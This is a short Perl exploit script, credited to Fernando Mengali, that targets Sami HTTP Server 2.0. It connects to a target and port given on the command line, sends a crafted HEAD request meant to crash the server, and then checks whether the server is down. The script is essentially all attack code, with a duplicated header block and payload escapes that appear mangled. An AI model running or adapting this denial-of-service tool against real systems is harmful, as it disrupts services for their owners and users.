#!/usr/bin/perl -w
#
#
# Date: 06/14/2021 14 Jun
#
# Version Vulnerable: Sami HTTP 2.0
#
# OS Tested: Windows XP PACK 3 Brazilian
#

use IO::Socket;#
#
# Date: 06/14/2021 14 Jun
#
# Version Vulnerable: Sami HTTP 2.0
#
# OS Tested: Windows XP PACK 3 Brazilian
#

use IO::Socket;

$sis="$^O";
print $sis;

if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}

system("$cmd");

if ((!$ARGV[0]) || (!$ARGV[1])) {

&apresentacao();
exit;
}

sub apresentacao {

print q {
##############################################################
# #
# [*] Sami HTTP Server 2.0 Denied Of Service
#
# #
# #
# [*] Author: Fernando Mengali #
# #
# #
# [+] Modo de uso: perl exploit.pl <Target> <Porta> #
# #
# #
################# Code Exploit ###############################
}
}


$target = $ARGV[0];
$porta = $ARGV[1];
print "Sobrecarregando servidor... ";

$socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $porta,
Proto => "tcp", Timeout => 1) || die "Não foi possível conectar ao
servidor: $target! ";

print $socket "HEAD /x41x42x43x44x45x46x47x25x49 HTTP/1.0 ";
close($socket);
sleep(10);
$socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $porta,
Proto => "tcp", Timeout => 1) || die "Servidor down: $target! ";
print $socket "HEAD / HTTP/1.0 ";


close($socket);